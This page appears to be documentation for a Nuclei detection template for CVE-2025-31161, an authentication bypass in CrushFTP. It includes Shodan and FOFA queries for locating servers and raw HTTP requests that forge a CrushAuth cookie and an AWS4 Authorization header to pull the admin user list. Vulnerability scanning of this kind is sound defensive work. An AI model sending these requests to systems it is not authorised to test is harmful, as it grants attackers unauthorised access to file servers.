Skip to content
Nuclei Templates

CrushFTP - Authentication Bypass

ID: CVE-2025-31161

Severity: critical

Author: parthmalhotra,Ice3man,DhiyaneshDk,pdresearch,whattheslime

Tags: cve,cve2025,crushftp,unauth,auth-bypass,rce

Description

Section titled “Description”

CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.

YAML Source

Section titled “YAML Source”
id: CVE-2025-31161


info:
  name: CrushFTP - Authentication Bypass
  author: parthmalhotra,Ice3man,DhiyaneshDk,pdresearch,whattheslime
  severity: critical
  description: |
    CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access. Remote and unauthenticated HTTP requests to CrushFTP may allow attackers to gain unauthorized access.
  reference:
    - https://projectdiscovery.io/blog/crushftp-authentication-bypass/
    - https://www.rapid7.com/blog/post/2025/03/25/etr-notable-vulnerabilities-in-next-js-cve-2025-29927/
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
    - https://nvd.nist.gov/vuln/detail/CVE-2025-31161
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-31161
    cwe-id: CWE-287
    epss-score: 0.00039
    epss-percentile: 0.08378
  metadata:
    max-request: 2
    vendor: crushftp
    product: crushftp
    shodan-query:
      - http.title:"CrushFTP WebInterface"
      - http.favicon.hash:-1022206565
      - http.html:"crushftp"
    fofa-query:
      - icon_hash="-1022206565"
      - title="CrushFTP WebInterface"
      - body="crushftp"
  tags: cve,cve2025,crushftp,unauth,auth-bypass,rce


variables:
  string_1: "{{rand_text_numeric(13)}}"
  string_2: "{{rand_text_alpha(28)}}"
  string_3: "{{rand_text_numeric(4)}}"


http:
  - raw:
      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/


      - |
        GET /WebInterface/function/?command=getUserList&serverGroup=MainUsers&c2f={{string_3}} HTTP/1.1
        Cookie: CrushAuth={{string_1}}_{{string_2}}{{string_3}}; currentAuth={{string_3}}
        Host: {{Hostname}}
        Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/


    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<user_list_subitem>crushadmin</user_list_subitem>"


      - type: word
        part: content_type
        words:
          - "text/xml"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100896c1672a9fc89c77210e641e1d30e0a2955335a933c332c62afc9fe2ba83ca802207934949ecee44acb5a56ed2582f2e0667ea8810a4e9fdd7cd3294d540af43d7f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-31161.yaml"

View on Github